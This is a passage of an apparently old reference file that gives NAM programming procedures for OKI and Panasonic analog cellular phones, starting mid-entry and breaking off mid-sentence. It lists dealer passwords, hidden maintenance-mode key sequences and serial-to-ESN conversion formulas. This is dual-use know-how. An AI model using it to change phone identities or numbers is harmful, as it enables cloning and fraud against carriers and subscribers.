Horn Alert Option: 1 Handsfree Option: 0 (1 if equipped) End-to-End Signalling: 1 Repertory Option: 1 Group ID Format: XX Access Overload Class: XX Station Class: 0000 (Binary) or 00 (Dec) Local Use Option: 1 MIN Option: 1 Initial Paging Channel: 333 or 334 Preferred System: 0 (B) or 1 (A) (*) This NAM must be programmed with the Curtis or Bytek Program because NOVATEL uses a differen method of determining the NAM checksum than the Motorola 1801 Horn Alert: FCN/PWR + HRN/SND New Unlock Code: NAM System Select: N/A Display ENS (in Hex) Aurora and 100 Series: FCN + LCK + 259 (with 1 second) "Debug" will be displayed + CLR + # 200 Series: FCN + LCK + # + 185 (Scroll with Volume control) ------------------------------------------------------------------------------- OKI CS1 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: OKI Programmer: Motorola 1801 or Curtis ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes, (after date code 427A XXXX) (427=Week 27 of 1984) Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Disabled (Enabled if equipped) Local Ude Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Hex Address B7 B0 13 0 0 0 0 X X X 1 Hex Address 13 - B0 Call Timer B1 Total Lock B2 Home System Only B3 Manual System Select Horn Select: HORN New Unlock Code: NAM System Select: N/A ------------------------------------------------------------------------------- OKI 21 & 23 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Handset ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes Number of Channels: 832 Programming Sequence: Step #1 First Time Program Only Program Dealer Password Power On Press * and # simultaneously-then release Enter the first time password: *12345678# Display will show "enter PW-STO" Enter New 10 digit password + STO (recommend 1234567890) Display will show "re-enter PW-STO" Re-Enter 10 digit password (1234567890) + STO This step restricts programming by those not aware of current password Step #2 Programming New or Used Phone Power On Press STO and RCL (Simulatneously) Release Enter password within 30 seconds of Power On (see first time Program info) Software Version and ESN will display Press CLR to enter program mode Initialize Phone (0+0, "Cleared" will appear) Enter Step number 1-9 and the parameters info for that step After entering each step. Press STO to enter data NAM contents may be scrolled with the Volume Up and DOWN keys Press CLR to exit programming mode. # of digits Mobile Number: 10 XXX-XXX-XXXX + STO System ID: 5 XXXXX + STO Initial Paging Channel: 4 0333 or 0334 + STO Access Overlaod: 2 XX + STO Lock Code: 4 XXXX + STO Group ID: 2 XX + STO Station Class: 4 1000 + STO Options(1): 4 11X0 + STO Security Code: 6 XXXXXX + STO (1) Options MIN Opt Local Use Handsfree Spare 1 1 0 or 1 0 OKI 21 Phone Operation Horn Alert: N/A New Unlock Code: FUNC + 18 + 6 digit security code (NAM) (Current Unlock Code will Display) + New 4 digit Unlock Code + STO System Select: FUNC + 2 + 6 digit security code (current System setting displays) + 2 + 2 + 2 etc.. (to scroll choices) + STO to enter selection AB or BA A only B only Home Only SID Press STO to enter selection OKI 23 Phone Operation Horn Alert: Menu (3 times) (Until "Review & Set" Displays) + 0 ("Unlock Code Set" displays) + 6 digit security code (Current Unlock Code Displays) + New 4 digit Unlock Code + STO System Select: MENU (3 times) (Until "Review & Set" Displays) + 3 (Current System Setting will display) + RCL + RCL + RCL (to Scroll Choices) + STO (To enter Selection) AB or BA A Only B Only Home Only SId Press STO to enter selection ------------------------------------------------------------------------------- OKI 200, 300 & 400 SERIES (*) MANUFACTURED BEFORE JANUARY 1, 1989 (*) ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: OKI Programmer: Motorola 1801 - CELNAM, Curtis or Bytek ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes Handset Programmable: No Number of channels: 666 (OKI-400 has 832) Phone Number: XXX-XXX-XXXX Lock Code: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree: Disabled (Enable if Equipped) Local Use: Enabled End-to-End Signalling: Enabled Horn Alert: Enabled System ID: XXXXX Preferred System: A or B Access Overload: XX Group ID: XX Initial Paging Channel: 333 or 334 Station Class: XX These series of phones must be initialized after programmig and prior to being placed in service. To initialize phone follow the steps listed: OKI CDL 201/240: FCN + 9 + 9 + Lock Code + 0 + * All other units: FCN + 9 + 9 + * + Last 8 digits of Mechanical Serial # + * Pre 811 or 903 software (for 400 series). If phone has later software, see OKI 400 Series handset programming instructions. Horn Alert: OKI 201 Set- FCN + 91 + * Clear- FCN + 91 + # OKI-Portable: N/A OKI-210, 230, 410, 420, 430, 440, 450, 490 Set- FCN + 50 + * Clear- FCN + 50 + # New Unlock Code: OKI 201, 210, 240, 410, 420, 440, 450 & 490: NAM OKI 230, 300 Portable and 430: FCN + 04 + * + Current Unlock Code (NAM) + New Unlock Code (8 digits max) System Select: OKI 201 & 240 FCN + 01 + Unlock Code + X + * X=0 Standard (AB or BA) X=1 Alternate (BA or AB) X=2 A Only X=3 B Only X=4 Home OKI 210, 230, 410, 420, 430, 440, 450, 490 FCN + 01 + * + RCL + RCL + RCL (to scroll options) Options include: STD AB or STD BA SCN BA or SCN AB SCN A SCN B SCN HO Press * to enter selection or CLR to exit without changing sel ------------------------------------------------------------------------------- OKI 400 SERIES - WITH 811, 903, or 905 SOFTWARE ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Handset ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes Handset Programmable: Yes Number of Channels: 666 (811 software) or 832 (903, 904, 905 software) Programming Sequence: Power On Enter Sequence END + RCL + FCN + CLR + SND Enter Code: 08693427 (Software 811 or 903) or Enter Code: 39061875 (Software 904 or 905) (904/905 used in CHEVROLET Transportable) Code must be entered within 10 seconds of power on CLR can be used to erase a mistake in input After inputting data for a specific location, press # to enter, then press * to increment Press END to write NAM information # of Digits Mobile Number: 10 XXX-XXX-XXXX + # + * System ID: 5 XXXXX + # + * Initial Paging Channel: 4 0333 or 0334 + # + * Access Overload: 2 XX + # + * Lock Code: 3-4 XXX or XXXX + # + * Group ID: 2 XX + # + * Station Class: 4 0000 (811 software) or 1000 + # + * Option Bits: 4 11XX + # + * Option Bits; MIN Option Local Use Handsfree Horn Alert 1 1 0 or 1 0 or 1 Some of the models with this software were still equipped with NAM socket. Do _NOT_ attemp to program phone with a NAM if the phone has a 811, 903, 904, or 905 software Horn Alert: FUNC + 50 + * (Activate) FUNC + 50 + # (Deactivate) New Unlock Code: NAM (Most Models) OKI 430: FUNC + 04 + * + 3-4 digit security code System Select: FUNC + 01 + * + RCL + RCL + RCL (Continue pressing RCL until one of the following prompts appears) SCAN BA, SCAN AB, SCAN A, SCAN B, HOME, ENTER SID (430 ONLY) Press * to enter selection and CLR to exit function ------------------------------------------------------------------------------- OKI 610, 630, 691 Transportable & 692 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Handset ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes Handset Programmable: Yes Number of Channels: 832 Programming Sequence: Power Off Power On Press and hold two keys simultaneously once wake up tone has stopped Use RCL and MENU for 630 and 692 Use any two number keys for 610 and 691 Release depressed keys and enter Password-0008693427 Software Version and ESN will display press CLR to enter Program mode Enter Step Number (1 to 9) then enter data Press * (610 & 691) or STORE (630 & 692) to enter each step. Once Data has been entered, the NAM information can be scrolled with the Vol UP or DN key Press CLR + CLR to write NAM information # of Digits Mobile Number 1: 10 XXX-XXX-XXXX System ID 1: 5 XXXXX Initial Paging Channel: 3 XXX 1 Press * to program 2nd Number (630 and 692 models) * Mobile Number 2: 10 XXX-XXX-XXXX * System ID 2: 5 XXXXX * Initial Page Channel: 3 XXX Access Overload: 2 XX Lock Code: 4 XXXX Group ID: 2 XX Station Class(4): 4 1000 Options(3): 4 11X1 Security Code: 6 XXXXXX (3) Options... MIN Option Local Use Handsfree Horn Alert 0=Disable 1 1 0 or 1 1 1=Enable (4) Enter Station Class In Binary (1000 Binary = 08 Dec) New Unlock Code: FUNC + 92 + 6 digit Security Code (NAM) + New 4 digit Unlock Code + * System Select: FUNC + 3 + 3 + 3 etc... (to scroll thru selection) SCN AB SCN BA SCN A SCN B SCN HO Press * to enter selection ------------------------------------------------------------------------------- OKI 620 & 693 Transportable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Handset ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes Handset Programmable: Yes Number of Channels: 832 Programming Sequence: Power Off Power On After wake up tone has stopped, press and hold the RCL and DUNC keys simultaneously Release depressed keys and enter password: 0008693427 Software Version and ESN will display Press CLR to enter Program Mode Enter Step Number (1 to 9) then thru data Press STO to enter each step Once data has been entered, the NAM information can be scrolled with the VOL UP or DN key press CLR + CLR to write NAM information # of Digits Mobile Number 1: 10 XXX-XXX-XXXX + STO + VOL DN System ID 1: 5 XXXXX + STO + VOL DN Initial Paging: 3 XXX + STO + VOL DN PRESS * to program 2nd NAM *Mobile Number 2: 10 XXX-XXX-XXXX + STO + VOL DN *Systen ID 2: 5 XXXXX + STO + VOL DN *Init Pag Chan 2: 3 XXX + STO + VOL DN Access Overload: 2 XX + STO + VOL DN Lock Code: 4 XXXX + STO + VOL DN Station Class(4): 4 1000 + STO + VOL DN Options(3): 4 11X1 + STO + VOL DN Security Code: 6 XXXXXX + STO + VOL DN (3) Options Step- MIN Option Local Use Handsfree Horn Alert 1 1 0 or 1 1 (4) Enter Station Class in Binary (1000 binary = 08 decimal) New Unlock Code: FUNC + 92 + 6 digit security code (NAM) + New 4 digit Unlock Code + STO System Select: FUNC + 3 + 3 + 3 + etc... (to scroll thru selections) SCN AB SCN BA SCN A SCN B SCN HOME Press STO to enter selection ------------------------------------------------------------------------------- OKI 700 Portable & ACC91 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Keypad ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes Handset Programmable: Yes Number of Channels: 832 Programming Sequence: Power On (wait for beep) Press MENU and RCL simulatenously Enter code 0008693427 ESN will appear in HEX and Software Version Press CLR to enter Program Mode Continue to next step for NAM #1 or Press * to program #2 Press STO to store data for each step Press CLR + CLR to write NAM information # of Digits Mobile Number 1: 10 XXX-XXX-XXXX + STO System ID 1: 5 XXXXX + STO Initial Page Channel 1: 3 XXX + STO Access Overload: 2 XX + STO Lock Code: 4 XXXX + STO Group ID: 2 XX + STO Station Class(1): 4 1000 (ACC91) + STO 1010 (700 Port) + STO Options(2): 4 XXXX + STO Security Code: 6 XXXXX + STO New Unlock Code: MENU + Vol Up or Down keys until "Unlock Code Set" appears Enter 6 digit Security code + new 1-8 digit unlock code + STO System Select: MENU + Vol Up or Down keys until "System" displays. Repeatedly press RCL to scroll selections. Prefer B Prefer A System A System B Home Only Only SID Press STO to enter selection ------------------------------------------------------------------------------- OKI 710 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Keypad ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes Number of Channels: 832 Programming Sequence: Program Dealer Password first Press * and # simultaneously then enter *12345678# Enter 10 digit dealer password (Recommened to use 1234567890) Press STO to enter password into memory Unit will request you to enter password again Enter programmed Dealer password + STO Programming the Phone: Power On Press FUNC and RCL simultaneously then release Enter Dealer Password (See Part I) (Password must be entered with 30 seconds of Power On) Software Version will display "Spd Dial Mem Clear" then "To Reset Press 0" will display Press 0 to clear memory locations (or CLR to pass this step) "Default Data Set" then "To Reset Press 0" will display Press 0 to reset phone options (or CLR to skip) "NAM 1" then "OWN#" will display After each parameter is entered, press STO to enter data then Vol Down to increment Press CLR to exit (This also allows access to NAM 2) Repeatedly press CLR to exit Program Mod # of Digits Mobile Number: 10 XXX-XXX-XXXX + STO + VOL DN System ID: 5 XXXXX + STO + VOL DN Initial Paging Channel: 4 0333 or 0334 + STO + VOL DN Access Overload: 2 XX + STO + VOL DN Unlock Code: 4 XXXX + STO + VOL DN Group ID: 2 XX + STO + VOL DN Station Class: 4 1010 (10d) + STO + VOL DN Options(1): 4 11X0 + STO + VOL DN Security Code: 6 XXXXXX + STO + VOL DN Options(1): MIN Options Local Use Handsfree Not used 1 1 0 or 1 0 New Unlock Code: FUNC + 14 + 6 digit security code (Current Unlock Code displays) + New 4 digit unlock Code + STO + CLR (to exit) System Select: FUNC + 12 + 6 digit security code + Repeatedly press 2 to scroll choices; AB BA B Only A Only Home Only SID Press STO to enter selection Press CLR (to exit) ------------------------------------------------------------------------------- OKI 750 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Keypad ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes Number of Channels: 832 Programming Sequence: Program Dealer Password First Press * and # simultaneously then enter *12345678# Enter 10 digit Dealer password (Recommended to use 1234567890) Press STO to enter password into memory Unit will request you enter password again Enter programmed Dealer password Programming the Phone: Power On Press MENU and RCL simultaneously then release Enter Dealer Password (see above) (Password must be entered within 30 seconds of power on) Software Version and ESN will display "Spd Dial Mem Clear" then "To Reset Press 0" will display Press 0 to Clr Mem Locations (or CLR to pass this step) "Default Data Set" then "To Reset Press 0" will display "NAM 1" then "OWN#" will display After each parameter is entered, press STO to enter data then VOL DOWN to increment Press CLR to exit (this also allows access to NAMs 2-5) Repeatedly press CLR to exit Program Mode # of Digits Mobile Number: 10 XXX-XXX-XXXX + STO + VOL DN System ID: 5 XXXXX + STO + VOL DN Initial Paging channel: 4 0333 or 0334 + STO + VOL DN Access Overload: 2 XX + STO + VOL DN Unlock Code: 4 XXXX + STO + VOL DN Group ID: 2 XX + STO + VOL DN Station Class: 4 1010 (10d) Options(1): 4 11X0 + STO + VOL DN Security Code: 6 XXXXXX + STO + VOL DN (1) Options: MIN Options Local Use Handsfree Hot used 1 1 0 or 1 0 Programming Sequence (2nd NAM): Press CLR after programming NAM 1 Enter Mobile Number #2 + STO + VOL DN Enter System ID #2 + STO + VOL DN Enter Init Paging Channel #2 + STO + VOL DN Press CLR to exit and program #2 + STO + VOL DN Press CLR again to exit program mode ------------------------------------------------------------------------------- OKI 810 MOBILE AND 891 TRANSPORTABLE ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Handset ESN Prefex DEC: 129 HEX: 81 ESN, S/N Match Required: Yes (129 + 0 + Last seven digits of serial #) Stamped Model Number: UM9023 Number of Channels: 832 Programming Sequence: Power Off Power On Press and hold RCL and FUNC keys simultaneously once wake up tone has stopped Release depressed keys and enter Password *12345678# "Enter New PW & STO" will display (Recommended number (1234567890) Enter Password + STO Re-Enter Password + STO Phone automatically steps to Program mode. Programming A Used Phone: Power Off Power On Press and hold RCL andFUNC keys simultaneously once wake tone has stopped Release depressed keys and enter Password (Enter Password within 30 seconds) ESN and Serial Number will display SPD Dial displays - Press 0 to clear or CLR to increment Default Data Displays-Press 0 to clear or CLR to increment SSN Displays (N/A) Press 0 to increment "Phon" appear Enter data for each step and press STO + Vol UP or DOWN to increment Once data has been entered, the NAM information can be scrolled with the Vol UP or Down Key. Press CLR to exit Program Mode # of Digits Mobile Number: 10 XXX-XXX-XXXX System ID: 5 XXXXX Initial Paging Channel: 4 0333 or 0334 Access Overload: 2 XX Group ID: 2 XX Unlock Code: 4 XXXX Station class(4): 4 1000 Options(3): 4 1101 Security Code: 6 XXXXXX (3)Options: MIN Options Local Use Not Used Horn alert (0=Disabled) 1 1 0 1 (1=Enabled) (4) Enter Station Class in binary (1000b = 08d) New Unlock Code: FUNC + 16 + 6 digit Security Code (NAM) + New 4 digit Unlock Code + STO System Select: FUNC + 2 + 6 digit security Code + 2 + 2 + ...etc (to scroll thru selections) SCN AB SCN BA SCN A SCN B SCN Ho SID NO. (Enter System ID #) Press STO to enter selection ------------------------------------------------------------------------------- OKI 830 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Handset ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes (129 + 00 + Last 6 digit of serial #) Stamped Model Number: UM9023 Number of Channels: 832 Program Sequence: % First Time Programming % Power Off Power On Press and hold RCL and MENU keys simultaneously once wake tone has stopped Release depressed keys and enter Password *12345678# "Enter New Pw & STO" will display (Recommeded number 1234567890) Enter Password + STO Re-enter Password + STO Phone automatically steps to Program Mode Programming Sequence: % Use Phone % Power Off Power On Press and hold RCL and MENU keys simultaneously once wake tone has stopped Release depressed keys and enter Password (Enter Password within 30 seconds) ESN and Serial Number will display SSN display (N/A) Press CLR to increment SPD Dial displays - Press * to clear or CLR to increment Default Data displays - Press * to clear or CLR to increment Power ON "Message" and "Enter Alpha" will display Press CLR to exit or enter alpha message to display during power up of phone NAM 1 program appears (Press VOL Down to select NAM 2) Enter Data for each step + STO + VOL Down to increment Once data has been entered, the NAM information can be scrolled with the VOL Up or Down Key Press CLR to exit Program mode Mobile Number: 10 XXX-XXX-XXXX System ID: 5 XXXXX Initial Paging Channel: 4 0333 or 0334 Access Overload: 2 XX Group ID: 2 XX Unlock Code: 4 XXXX Station Class(4): 4 1000 Options(3): 4 1101 Security Code: 6 XXXXXX (3) Options: MIN Options Local Use Audio Mute Horn Alert 1 1 0 1 (4) Enter Station Class in Binary (1000b = 08d) New Unlock Code: FUNC + 16 + 6 digit security code (NAM) + new 4 digit Unlock code + * System Select: MENU + or ("Until Adm. Menu" displays) + RCL + 6 digit security code + (Until Current Selection Displays) + RCL (To view choices) + STO + CLR (To Exit) For Only SID: STO + 5 digit System Identification + STO + CLR + CLR (to exit) ------------------------------------------------------------------------------- OKI 900 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Keypad ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes (129 + last 6 digit of serial #) Stamped Code Number: UM9022 Number of Channels: 832 Programming Sequence: Program Dealer Password First Press RCL and MENU keys simultaneously then enter *12345678# Enter 10 digit Dealer Password (Recommended 1234567890) Press STO to enter password into memory Unit will request you enter password again Enter programmed Dealer Password and press STO Programming the Phone Power On Press MENU and RCL simultaneously then release Enter Dealer Password (Password must be entered within 30 seconds of Power On) Software Version and ESN (In Hex) will display "Spd Dial Mem Clear" then "To Reset Press *" will display Press * to Clear Memory Locations (or CLR to pass this step) "Default Data Set" then "To Reset Press *" will display "Press * to rest phone options (or CLR to pass this step) "Power On" will display for 2 seconds then "Enter Alpha" shows. Enter 8 letters maximum then STO step to NAM programming "NAM 1" then "OWN#" will display. After each parameter is entered, press STO to enter data then VOL Down to increment Press CLR to exit (This also allows access to NAMs 2-5) Repeatedly press CLR to exit Program Mode # of Digits Mobile Number: 10 XXX-XXX-XXXX + STO + VOL Down System ID: 5 XXXXX + STO + VOL Down Initial Paging Channel: 4 0333 or 0334 + STO + VOL Down Access Overload: 2 XX + STO + VOL Down Group ID: 2 XX + STO + VOL Down Unlock Code: 4 XXXX + STO + VOL Down Station Class: 4 1010 (10d) + STO + VOL Down Options(1): 4 11X0 + STO + VOL Down Security Code: 6 XXXXXX + STO + VOL Down (1) Options: MIN Option Local Use Handsfree Not Used (0=Disabled) 1 1 0 or 1 0 (1=Enabled) % Programming NAMs 2-5 % Programming Sequence: Press CLR after Programming NAM 1 Enter Mobile Number #2 + STO + VOL Down Enter System ID #2 + STO + VOL Down Enter Intial Paging channel #2 + STO + VOL Down Enter Access Overload #2 + STO + VOL Down Enter Group ID #2 + STO + VOL Down Press CLR to exit and program NAMs #3-#5 Repeat above steps to program NAMs #3-#5 Press CLR again to exit Program Mode New Unlock Code: MENU + VOL Down + VOL Down etc... (until "Adm.Menu" displays) + RCL + 6 digit security code (NAM) + VOL Down + VOL Down + VOL Down ("Unlock Code Set" and "Current Unlock Code" will display) + Ente new 1-8 digit Unlock Code + STO + CLR (To exit) System Select: MENU + VOL Down + VOL Down + etc... (Until "Adm.Menu" displays) + RCL + 6 digit security code (NAM) + VOL Down + VOL Down (Until Current Status displays) + RCL + RCL + RCL (To scroll choices) + STO + CLR (to exit) Pref A Pref B A Only B Only Home Only SID Press STO to enter selection Press CLR to exit ------------------------------------------------------------------------------- PANASONIC CM/TF 800 (EB2502/EB2503, EBC20/EBC30) ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: PANASONIC Programmer: Keypad ESN Prefix DEC: 136 HEX: 88 ESN, S/N Match Required: Requires Conversion (See Conversion Instructions) Stamped Mode Number: EB-2502 or EB-2503 Number of Channels: 832 Programming Sequence: Install fully charge battery Power On Enter Maintenance Mode: * + 0 + # + 0 + * + 0 + # + 0 Enter * + 1 + SND (to program NAM 1) or * + 2 + SND (to program NAM 2) NAM 1 must be programmed before NAM 2 can be programmed. When programming NAM 2 only use steps 01-06 The sequence * + 0 + # + 0 + * + 0 + # + 0 + 1 must be entered within 10 seconds of power up Enter parameter information + STO and then the Step Numnber (i.e., to program System ID, XXXXX + STO + 01) To recal any information already programmed into phone, press RCL + Step Number Press STO + * + * to write NAM information Press END or * + 4 to exit Maintenance Mode Step # of Digits 01 System ID: 5 XXXXX 02 Mobile Number: 10 XXX-XXX-XXXX 03 Preferred System: 1 0(B) ot 1(A) 04 Initial Page Channel: 3 333 or 334 05 Access Overload: 2 XX 06 Group ID: 2 XX 07 Digit Dial Limit: 2 00=32 digits 08 Station Class: 2 XX 09 Speed Dial Number: 12 XXXXXXXXXXXX 10 Lock Code: 2-4 XX, XXX or XXXX 11 Option Bits (FCN 1)(1): 8 1100-0000 12 Option Bits (FCN 2)(2): 8 0001-0100 13 Option Bits (FCN 3)(3): 8 1111-0111 (1) Step 11: Local MIN Not Not Horn Radio Not (0=Disabled) Use Opt Used Used Alert Mute Used (1=Enabled) (2) Step 12: Not Built-in Auto Full Not A/B Pref Home (0=Disabled)Used Monitor Lock Lock Used Select Only Only (1=Enabled) (3) Step 13: Call in DTMF Not Dial Not Cumulative Resettable Indiv (0=65 ms) Absence Interval Used Lock Used Timer Timer Timer (1=Continuous) Conversion of EB-2502 and EB-2503 serial number to ESN (for serial numbers over 1,000,000) (Last 6 digits of stamped Serial Number) + [(7th digit) (262,144)]=ESN without prefix Example #1: Serial Number on phone is 1,234,567 234,567 + [(1)(262,144)] = (496,711) This phone's ESN is 13600496711 Example #2: Serial Number on phone is 3,234,567 234,567 + [(3)(262,144)]=(1,020,999) This phone's ESN is 13601020999 Display ESN: Install Test Cable (Part #WWG18965BA) Enter Maintenance Mode: * + 0 + 0 + 0 + 0 + 0 + # Press * + 3 + SND Enter 1 + 1 + SND ESN will display in decimal. Since the display shows 10 digits maximun, first digit of the prefix (136) is hidden) New Unlock Code: NAM Multiple NAM Select: F + 8 System Select: F + 7 + X X=1 Standard (AB or BA) X=2 A Only X=3 B Only X=4 Home ------------------------------------------------------------------------------- PANASONIC EB-500, CM-500, TP-500, EB-T10, EB-C10 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: PANASONIC Programmer: Handset with PANASONIC programming adaptor (WWG1865BA) ESN Prefix DEC: 136 HEX: 88 ESN, S/N Match Required: Yes, requires conversion if serial number is over 1,000,000 (See Conversion bellow) Handset Programmable: Yes, with adaptor Number of Channels: 832 Programming Sequence: Connect programming adaptor to transceiver and 12 volts power supply Connect handset directly to transceiver Enter the following code: * + 0 + 0 + 0 + 0 + # (to enter maintenance mode) * + 1 + SND (to program NAM #1) or * + 2 + SND (to program NAM #2) NAM #1 must be programmed before NAM 2 can be input "In Use" and "No Svc" will illuminate if improper data has been input Enter individual data then press STO and the correct 2 digit location Press STO + * + * to program NAM (Press NAM to exit) % Program NAM 1 % Step # of Digits 01 System ID: 5 XXXXX 02 Mobile Numer: 10 XXX-XXX-XXXX 03 Preferred System: 1 0 (B) or 1 (A) 04 Initial Paging Channel: 3 333 or 334 05 Access Overload: 2 XX 06 Group ID: 2 XX 07 Dialed Digit Limit (00 for 32, 29 for 29, 28 for 28): 2 00 08 Station Class: 2 08 09 Frequently Dialed Number for Location: 10 XXX-XXX-XXX 10 Lock Code: 2-4 XX, XXX or XXXX 11 Options (1): 8 11000XX0 12 Options (2): 8 0XX101XX 13 Options (3): 8 11010111 (1) Step 11 - Options [0=Disabled, 1=Enabled] Local MIN Not Not Not Horn Radio Not Use Opt Used Used Used Alert Mute Used (2) Step 12 - Options [0=Disabled, 1=Enabled] Not Built-in Auto Full Not A/B Pref Home Used Monitor Lock Lock Used Select Only Only (3) Step 13 - Options [0=65 milliseconds, 1=Continuous] Call in DTMF Not Dial Not Cumulative Resettable Indiv Absence Interval Used Lock Used Timer Timer Timer % Programming NAM 2 % Step # of Digits 01 System ID 2: 10 XXX-XXX-XXXX 02 Mobile Number 2: 5 XXXXX 03 Preferred System 2: 1 0 (B) or 1 (A) 04 Initial Paging Channel: 3 333 or 334 05 Access Overload 2: 2 XX 06 Group ID 2: 2 XX The following two command sequences cause phone to exit maintenance mode. STO + * + * (To store programmed information) STO + # + # (No programmed information will be saved) % Coversion of EB-500 serial number to ESN % [for serial numbers 1,000,000 to 1,999,999] (Stamped Serial Number)-(1,000,000) + (262,144) = ESN without prefix Example: Serial Number is 1,234,567 (1,234,567) - (1,000,000) + (262,144) = (496,711) The phone's ESN is 13600496711 % For serial numbers 2,000,000 to 2,999,999 % (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix % For serial numbers 3,000,000 to 3,999,999 % (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix Display ESN: Insert Program Adaptor Enter Maitenance Mode: * + 0 + 0 + 0 + 0 + # Press * + 3 + SND Enter 1 + 1 + SND ESN will display in decimal. Since the display shows 10 digits maximum, first digit of the prefix (136) is hidden. Press CHK to see the missing "1" Horn Alert: F + 4 + 2 New Unlock Code: NAM System Select: F + 7 + X X=1 AB or BA Standard X=2 A Only X=3 B Only X=4 Home % Conversion of EB-500 serial number to ESN % [For serial numbers 1,000,000 to 1,999,999] (Stamped Serial Number) - (1,000,000) + (262,144) = ESN without prefix Example: Serial Number is 1,234,567 (1,234,567) = (1,000,000) + (262,144) = (496,711) This phone's ESN is 13600496711 % For serial numbers 2,000,000 to 2,999,999 % (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix % For serial numbers 3,000,000 to 3,999,999 % (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix Display ESN: Insert Program Adaptor Enter Maintenance Mode: * + 0 + 0 + 0 + 0 + # Press * + 3 + SND Enter 1 + 1 + SND ESN will display in decimal. Since the display shows 10 digits maximin, first digit of the prefix (136) is hidden. Press CHK to see the missing "1" Horn Alert: F + 42 New Unlock Code: NAM System Select: F + 7 + X X=1 AB or BA Standard X=2 A Only X=3 B Only X=4 Home ------------------------------------------------------------------------------- PANASONIC EB 3500 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: PANASONIC Programmer: Keypad with PANASONIC adaptor (Part #WWG1036A) ESN Prefix DEC: 136 HEX: 88 ESN, S/N Match Required: Requires Conversion (See Conversion) Handset Programmable: Yes, provided programming adaptor is availabe Number of Channels: 832 Programming Sequence: Install fully charged battery and programming adaptor Power On Enter Maintenance Mode: * + 0 + 0 + 0 + 0 + # Enter * + 1 + SND (to program NAM 1) or * + 2 + SND (to program NAM 2) NAM 1 must be programmed before NAM 2 can be programmed. When programming NAM 2 only use steps (01-06) Enter parameter information + STO and then the Step # (i.e., to program System ID, XXXXX + STO + 01) To recall any information already programmed into phone, press RCL + Step Number Press STO + * + * to write NAM information Press STO + * + 4 to exit Maintenance mode Step # of Digits 01 System ID: 5 XXXXX 02 Mobile Number: 10 XXX-XXX-XXXX 03 Preferred System: 1 0(B) or 1(A) 04 Initial Page Channel: 3 333 or 334 05 Access Overload: 2 XX 06 Group ID: 2 XX 07 Digital Dial Limit: 2 00=32 digits. 08 Station Class: 2 XX 09 Speed Dial Number: 12 XXXXXXXXXXXX 10 Lock Code: 2-4 XX, XXX or XXXX 11 Options (FCN 1)(1): 8 1101X000 12 Options (FCN 2)(2): 8 0XXX0XXX 13 Options (FCN 3)(3): 8 XXXX0111 Step 11: Local MIN Not End-to Ringer Not Not Not Use Opt Used End Silence Used Used Used Step 12: Built-In Not Monitor Auto Full Not A/B Pref Home Used Svc Only Lock Lock Used Select Only Only Step 13: Call in DTMF Send Dial Not Cumulative Resettable Indiv Absence Interval Lock Lock Used Timer Timer Timer % Conversion of EB-3500 serial number to ESN % [For serial numbers 1,000,000 to 1,999,999] (Stamped Serial Number) - (1,000,000) + (262,144) = ESN without prefix Example: Serial Number is 1,234,567 (1,234,567) = (1,000,000) + (262,144) = (496,711) This phone's ESN is 13600496711 % For serial numbers 2,000,000 to 2,999,999 % (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix % For serial numbers 3,000,000 to 3,999,999 % (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix Display ESN: Insert Program Adaptor Enter Maintenance Mode: * + 0 + 0 + 0 + 0 + # Press * + 3 + SND Enter 1 + 1 + SND ESN will display in decimal. Since the display shows 10 digits maximin, first digit of the prefix (136) is hidden. Press CHK to see the missing "1" New Unlock Code: NAM Multiple NAM Select: F + 8 System Select: F + 7 + X X=1 Standard AB or BA X=2 A Only X=3 B Only X=4 Home ------------------------------------------------------------------------------- PANASONIC HP600 (EB-3510), EBH-30 (EB-3511) Portables ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: PANASONIC Programmer: Keypad with PANASONIC adaptor (Part #EB-X0754) ESN Prefix DEC: 136 HEX: 88 ESN, S/N Match Required: Requires Conversion (See Conversion) Handset Programmable: Yes, provided programming adaptor is available or phone was manufactured after March 1, 1991. Number of Channels: 832 Determine Phone's manufacturer date by checking the lable on the back of portable. The lable shows 3 letters. The first letter is the year (A=91,B=92, etc). The second letter shows the month (A=January, B=February, etc) and 